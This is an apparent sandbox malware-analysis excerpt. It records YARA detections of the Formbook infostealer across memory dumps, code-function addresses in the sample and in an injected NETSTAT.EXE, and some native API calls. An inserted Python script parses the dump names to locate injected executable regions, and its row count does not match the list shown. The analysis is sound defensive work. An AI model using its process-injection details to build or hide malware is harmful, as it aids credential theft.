          Source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: TT COPY_02101011.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 1.1.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.TT COPY_02101011.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.TT COPY_02101011.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.TT COPY_02101011.exe.2a30000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.TT COPY_02101011.exe.2a30000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.TT COPY_02101011.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.TT COPY_02101011.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.TT COPY_02101011.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.TT COPY_02101011.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.TT COPY_02101011.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.TT COPY_02101011.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.TT COPY_02101011.exe.2a30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.TT COPY_02101011.exe.2a30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.TT COPY_02101011.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.TT COPY_02101011.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
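The memory-dump rows above carry more information than the rule name: each dump identifier encodes the process, the base address and the page protection of the region the Formbook rules fired on, so the same list also tells you which processes ended up holding the payload in executable memory. The script below is an added example, not part of the Joe Sandbox report, that parses a handful of rows copied from this section into a per-process inventory and flags executable regions outside the sample's own processes. It assumes (labelled as an assumption in the code) that Joe Sandbox names dumps as pid.run.dumpid.baseaddress.protection.type.sdmp with hexadecimal fields and that the protection field is the Win32 PAGE_* value; the process names come from the "Code function" rows (pids 0 and 1 are the sample, pid 9 is NETSTAT.EXE), and pid 4 is left unnamed because this section does not name it.

```python
"""Added example (not part of the Joe Sandbox report): build a per-process
inventory from the report's MEMORY YARA match rows.

Assumption: Joe Sandbox memory dumps are named
  <pid>.<run>.<dumpid>.<base address>.<protection>.<type>.sdmp
with hexadecimal fields, and <protection> is the Win32 PAGE_* value.
The <type> field is kept verbatim; this example does not decode it.
"""
import re
from collections import defaultdict

# Win32 page-protection constants from winnt.h.
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}

# Process names as given by the report's "Code function" rows.
# Pid 4 is not named in this section, so it is deliberately absent.
PROCESS_NAMES = {0: "TT COPY_02101011.exe", 1: "TT COPY_02101011.exe", 9: "NETSTAT.EXE"}

DUMP_RE = re.compile(
    r"Source:\s*(?P<pid>[0-9A-Fa-f]{8})\.(?P<run>[0-9A-Fa-f]{8})\.(?P<dumpid>\d+)"
    r"\.(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<type>[0-9A-Fa-f]{8})\.sdmp"
    r".*?Matched rule:\s*(?P<rule>\S+)"
)

# Constructed sample: rows copied from this section (UNPACKEDPE row included
# to show that non-dump rows are skipped). Author metadata is truncated.
SAMPLE_ROWS = [
    "Source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23",
    "Source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC",
    "Source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23",
    "Source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23",
    "Source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC",
    "Source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23",
    "Source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC",
    "Source: 1.2.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23",
]


def parse_row(row):
    """Parse one MEMORY match row; return None for rows that are not dumps."""
    m = DUMP_RE.search(row)
    if not m:
        return None
    prot = int(m["prot"], 16)
    return {
        "pid": int(m["pid"], 16),
        "base": int(m["base"], 16),
        "protection": PAGE_PROTECTION.get(prot & 0xFF, hex(prot)),
        # Any of the four PAGE_EXECUTE* bits means the region can run code.
        "executable": bool(prot & 0xF0),
        "type": m["type"],
        "rule": m["rule"],
    }


def inventory(rows):
    """Group matches by pid and base address, collecting the rules that hit."""
    per_pid = defaultdict(dict)
    for row in rows:
        r = parse_row(row)
        if r is None:
            continue
        region = per_pid[r["pid"]].setdefault(
            r["base"], {"protection": r["protection"], "executable": r["executable"], "rules": set()}
        )
        region["rules"].add(r["rule"])
    return per_pid


def injected_regions(per_pid, sample_pids=(0, 1)):
    """Executable payload regions in processes other than the sample's own.

    Pids 0 and 1 both run the sample image per the "Code function" rows,
    so anything left is the payload living in a foreign process.
    """
    out = []
    for pid, regions in per_pid.items():
        if pid in sample_pids:
            continue
        for base, info in regions.items():
            if info["executable"]:
                out.append((pid, PROCESS_NAMES.get(pid, "<unnamed in report>"), hex(base), info["protection"]))
    return sorted(out)


if __name__ == "__main__":
    inv = inventory(SAMPLE_ROWS)
    for pid in sorted(inv):
        for base, info in sorted(inv[pid].items()):
            print(f"pid {pid:>2} {hex(base):>11} {info['protection']:<23} {sorted(info['rules'])}")
    print("injected:", injected_regions(inv))
```

Run against the full match list the same grouping is what turns 80 near-identical rows into the three facts that matter for triage: the payload sits at 0x400000 in the hollowed copy of the sample, in two RWX regions of NETSTAT.EXE, and at 0xF349000 in pid 4, which is exactly the cross-process spread the "Maps a DLL or memory area into another process" and "Sample uses process hollowing technique" signatures describe.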
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_004030E3 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_00406043
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_00404618
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_0040681A
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_1000C41B
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_10015A51
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_10014272
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_10013D00
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_1000C90F
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_1000CD27
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_1000D15C
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_1000F16D
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_1001696C
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_1000D591
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_100147E4
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00401026
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_0041D0EE
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_0041C154
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00401174
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00408C90
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00402D88
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC20A0
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B620A8
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AAB090
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B628EC
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B51002
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AB4120
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A9F900
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B622AE
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00ACEBB0
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B5DBD2
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B62B28
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AA841F
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B5D466
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AC2581
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00AAD5E0
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B625DD
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00A90D20
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B62D07
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B61D55
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_00B62EF7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E2B28
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324EBB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D03DA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032DDBD2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E22AE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03234120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0321F900
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032EE824
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D1002
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032420A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E20A8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0322B090
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E28EC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E1FF1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032EDFCE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03236E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032DD616
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E2EF7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03210D20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E2D07
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E1D55
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03242581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0322D5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E25DD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0322841F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032DD466
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0077D0EE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_00768C90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_00762D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_00762D88
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_00762FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 0321B150 appears 45 times
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: String function: 00A9B150 appears 34 times
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 1_2_004185F0 NtCreateFile,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_004186A0 NtReadFile,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00418720 NtClose,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_004187D0 NtAllocateVirtualMemory,
